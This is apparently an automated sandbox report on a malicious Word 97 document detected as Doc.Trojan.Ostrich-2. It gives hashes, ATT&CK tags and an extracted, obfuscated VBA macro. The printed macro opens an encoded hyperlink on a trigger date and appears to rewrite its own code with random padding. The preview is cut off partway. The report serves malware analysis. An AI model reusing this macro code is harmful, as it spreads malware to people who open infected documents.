Office (OLE) malware analysis — malicious · 628e6be3dc5ce705

MALICIOUS

Office (OLE)

59.5 KB Created: 2001-05-18 18:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 7f68dcb3f95e0cfc74fa978e7f21a5be SHA-1: 9d5e8842d8ec6468979dbd5ced3898f8062426e9 SHA-256: 628e6be3dc5ce705ae77b508a4baf0a04931ff73880ac1c826bb83b1d638e547

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The macro attempts to execute a hyperlink with the address 'ñÃÖî†³–¸÷ ÄøªëúÉç•ÕêÅãÎÚÛîí•ÿû', suggesting it's designed to download and execute a second-stage payload. The ClamAV detection further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Ostrich-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Ostrich-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70486 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	70486 bytes
SHA-256: `410f6cb9e74f56a3a82ce6042cee21615b980e08bd4a1a90ba896e7ed2caf461`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub R8c39R() DO3W0XW: Rnpw9s: On Error GoTo USc855 '1976.127 841.8174 3464.258 4963.859 39.4617 77.98575 425.3977 Const U733s4J = "™·¢ž¼¿œáÏ€Ž°�Ä�›†ð¦š ‘¯´âº¾�‚øÑí‰ª•“®ÿÀã—òúë©”Ã÷�‹µ¶‡õÐ³’ˆì„¨¥Ëèù˜�¤ÌçŒ¡Í§Åà¬È¹¸ƒÓåÇ«óÂ»±Š½£ïŸÊÁ²ê" '"2/16/130" Dim F297d2T As String Dim W68pw As Long Dim PDbdIBxr As Object Dim R6y9hR As String If Day(Date) = &O34 Then '1211.509 6550.102 On Error Resume Next R6y9hR = "ñÃÖî†�³–¸÷ ÄøªëúÉç•ÕêÅãÎÚ�Û�îí•ÿ�û": GoSub Y8l121S ActiveDocument.FollowHyperlink Address:=R6y9hR, NewWindow:=False, AddHistory:=True On Error GoTo USc855 End If GoTo SP68AQ '438.1065 2601.158 1100.868 5727.295 GoTo RNbN77j6 WPeLoQA: PDbdIBxr.InsertLines W68pw, F297d2T Return '2045.063 1245.175 2297.195 4406.628 2176.436 GoTo RNbN77j6 SP68AQ: Dim LFxFM As Object Dim MG8A9v As Object Dim U82i823 As Object Dim Snlxs194 As Byte Dim CJC9B6nJ As String '487.993 1759.787 Dim K5tB0LoK As String Dim OTpFt88 As Variant Dim XlXEr As String Dim S3p7K2D As String '561.9731 111.8199 1733.125 2712.69 5586.817 3067.217 988.3445 4096.044 Dim V7Tb06dM As Long Dim RiGv45hL As Long '1500.215 1417.007 717.601 Dim N2BV7v As Long Dim QMpVT1r As Long Dim Y4HgPG As Long Dim NlIBX As Long Dim BIM1kCg5 As String Dim EbUi1iWp As String Dim RBvRpYf8 As String Dim LVI6wdrH As String '2796.313 27.34148 837.1344 430.9696 1775.602 4228.256 1683.623 1206.259 1680.418 Dim NhK633x As Variant Dim OV33p As Variant '2868.51 672.3703 619.99 18.60057 2342.623 2846.077 Dim Hc9UYI7 As Variant Dim N748BLT As String Dim Cd6k18 As Variant '1074.695 6230.085 5405.096 1409.419 GoSub S12OjVoG If (Day(Date) = &O5 And Month(Date) = &O3) Then On Error Resume Next R6y9hR = "ÓøñËùŸÏ´Ž ÏþÉ…®ºŒ": GoSub Y8l121S: BIM1kCg5 = R6y9hR R6y9hR = "ÍåãÈóê": GoSub Y8l121S: EbUi1iWp = R6y9hR '2170.811 6424.561 748.0565 1347.79 946.3391 203.8373 3493.469 1815.02 18.94842 MsgBox BIM1kCg5, &O40, EbUi1iWp On Error GoTo USc855 End If GoTo MXenp GoTo RNbN77j6 V2BvQdE: ReDim OTpFt88(&O26) As String With MG8A9v V7Tb06dM = &O0: RiGv45hL = &O0 .Find "DO3W0XW" & Chr(&O72), V7Tb06dM, &O0, &O0, &O0, True, True, False: If V7Tb06dM = &O0 Then GoTo USc855 '4186.62 3380.531 288.6767 646.8135 .Find "RNbN77j6" & Chr(&O72), RiGv45hL, &O0, &O0, &O0, True, True, False: If RiGv45hL = &O0 Then GoTo USc855 For N2BV7v = V7Tb06dM To RiGv45hL '4645.32 2620.323 1848.988 8989.042 2412.57 595.9981 245.6242 3135.045 1819.229 BIM1kCg5 = Trim(.Lines(N2BV7v, &O1)) '1276.299 1730.687 1194.509 1049.284 1301.74 2719.696 4434.066 If BIM1kCg5 <> "" And Left(BIM1kCg5, &O1) <> Chr(&O47) Then XlXEr = XlXEr & String(Int(Rnd * &O12), Chr(&O40)) & BIM1kCg5 & vbCr If Int(Rnd * &O12) + &O1 = &O1 Then XlXEr = XlXEr & vbCr If Int(Rnd * &O11) + &O1 > &O10 Then BIM1kCg5 = "" For QMpVT1r = &O0 To Int(Rnd * &O11) + &O1: BIM1kCg5 = BIM1kCg5 & Rnd * (Rnd * &O23420) & vbTab: Next QMpVT1r XlXEr = XlXEr & String(Int(Rnd * &O12), Chr(&O40)) & Chr(&O47) & BIM1kCg5 & vbCr End If Next N2BV7v End With GoTo MX0t3Nb GoTo RNbN77j6 V1UQ3l: V7Tb06dM = InStr(V7Tb06dM + Len(U733s4J), XlXEr, Chr(&O47) & Chr(&O42)) + &O1 If V7Tb06dM > 0 Then RiGv45hL = InStr(V7Tb06dM, XlXEr, vbCr) - &O1 Else: GoTo USc855 CJC9B6nJ = Trim(Mid(XlXEr, V7Tb06dM + &O1, (RiGv45hL - V7Tb06 ... (truncated)

SHA-256: 410f6cb9e74f56a3a82ce6042cee21615b980e08bd4a1a90ba896e7ed2caf461

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub R8c39R()
DO3W0XW:
Rnpw9s:
     On Error GoTo USc855
'1976.127   841.8174    3464.258    4963.859    39.4617 77.98575    425.3977
     Const U733s4J = "™·¢ž¼¿œáÏ€Ž°�Ä�›†ð¦š ‘¯´âº¾�‚øÑí‰ª•“®ÿÀã—òúë©”Ã÷�‹µ¶‡õÐ³’ˆì„¨¥Ëèù˜�¤ÌçŒ¡Í§Åà¬È¹¸ƒÓåÇ«óÂ»±Š½£ïŸÊÁ²ê" '"2/16/130"
 Dim F297d2T As String
   Dim W68pw As Long
         Dim PDbdIBxr As Object
       Dim R6y9hR As String
    If Day(Date) = &O34 Then

  '1211.509 6550.102
      On Error Resume Next
R6y9hR = "ñÃÖî†�³–¸÷ ÄøªëúÉç•ÕêÅãÎÚ�Û�îí•ÿ�û": GoSub Y8l121S
  ActiveDocument.FollowHyperlink Address:=R6y9hR, NewWindow:=False, AddHistory:=True
  On Error GoTo USc855
    End If
     GoTo SP68AQ
   '438.1065    2601.158    1100.868    5727.295
  GoTo RNbN77j6
WPeLoQA:
         PDbdIBxr.InsertLines W68pw, F297d2T
        Return
  '2045.063 1245.175    2297.195    4406.628    2176.436
      GoTo RNbN77j6
SP68AQ:
  Dim LFxFM As Object
  Dim MG8A9v As Object
        Dim U82i823 As Object
      Dim Snlxs194 As Byte
       Dim CJC9B6nJ As String
 '487.993   1759.787
 Dim K5tB0LoK As String
       Dim OTpFt88 As Variant
  Dim XlXEr As String
       Dim S3p7K2D As String
 '561.9731  111.8199    1733.125    2712.69 5586.817    3067.217    988.3445    4096.044
 Dim V7Tb06dM As Long
    Dim RiGv45hL As Long
         '1500.215  1417.007    717.601
     Dim N2BV7v As Long
    Dim QMpVT1r As Long
       Dim Y4HgPG As Long
 Dim NlIBX As Long
       Dim BIM1kCg5 As String

   Dim EbUi1iWp As String
      Dim RBvRpYf8 As String
    Dim LVI6wdrH As String
    '2796.313   27.34148    837.1344    430.9696    1775.602    4228.256    1683.623    1206.259    1680.418
      Dim NhK633x As Variant
        Dim OV33p As Variant
        '2868.51    672.3703    619.99  18.60057    2342.623    2846.077
Dim Hc9UYI7 As Variant
       Dim N748BLT As String
 Dim Cd6k18 As Variant
        '1074.695   6230.085    5405.096    1409.419

       GoSub S12OjVoG
   If (Day(Date) = &O5 And Month(Date) = &O3) Then
     On Error Resume Next
        R6y9hR = "ÓøñËùŸÏ´Ž ÏþÉ…®ºŒ": GoSub Y8l121S: BIM1kCg5 = R6y9hR
         R6y9hR = "ÍåãÈóê": GoSub Y8l121S: EbUi1iWp = R6y9hR
    '2170.811   6424.561    748.0565    1347.79 946.3391    203.8373    3493.469    1815.02 18.94842
        MsgBox BIM1kCg5, &O40, EbUi1iWp
 On Error GoTo USc855
         End If
  GoTo MXenp

   GoTo RNbN77j6
V2BvQdE:

  ReDim OTpFt88(&O26) As String
     With MG8A9v
      V7Tb06dM = &O0: RiGv45hL = &O0


     .Find "DO3W0XW" & Chr(&O72), V7Tb06dM, &O0, &O0, &O0, True, True, False: If V7Tb06dM = &O0 Then GoTo USc855
  '4186.62  3380.531    288.6767    646.8135
.Find "RNbN77j6" & Chr(&O72), RiGv45hL, &O0, &O0, &O0, True, True, False: If RiGv45hL = &O0 Then GoTo USc855
       For N2BV7v = V7Tb06dM To RiGv45hL
'4645.32    2620.323    1848.988    8989.042    2412.57 595.9981    245.6242    3135.045    1819.229
   BIM1kCg5 = Trim(.Lines(N2BV7v, &O1))
        '1276.299   1730.687    1194.509    1049.284    1301.74 2719.696    4434.066
   If BIM1kCg5 <> "" And Left(BIM1kCg5, &O1) <> Chr(&O47) Then XlXEr = XlXEr & String(Int(Rnd * &O12), Chr(&O40)) & BIM1kCg5 & vbCr
        If Int(Rnd * &O12) + &O1 = &O1 Then XlXEr = XlXEr & vbCr
       If Int(Rnd * &O11) + &O1 > &O10 Then
      BIM1kCg5 = ""
       For QMpVT1r = &O0 To Int(Rnd * &O11) + &O1: BIM1kCg5 = BIM1kCg5 & Rnd * (Rnd * &O23420) & vbTab: Next QMpVT1r

XlXEr = XlXEr & String(Int(Rnd * &O12), Chr(&O40)) & Chr(&O47) & BIM1kCg5 & vbCr
       End If
       Next N2BV7v
   End With

    GoTo MX0t3Nb
      GoTo RNbN77j6
V1UQ3l:
     V7Tb06dM = InStr(V7Tb06dM + Len(U733s4J), XlXEr, Chr(&O47) & Chr(&O42)) + &O1
 If V7Tb06dM > 0 Then RiGv45hL = InStr(V7Tb06dM, XlXEr, vbCr) - &O1 Else: GoTo USc855

         CJC9B6nJ = Trim(Mid(XlXEr, V7Tb06dM + &O1, (RiGv45hL - V7Tb06
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.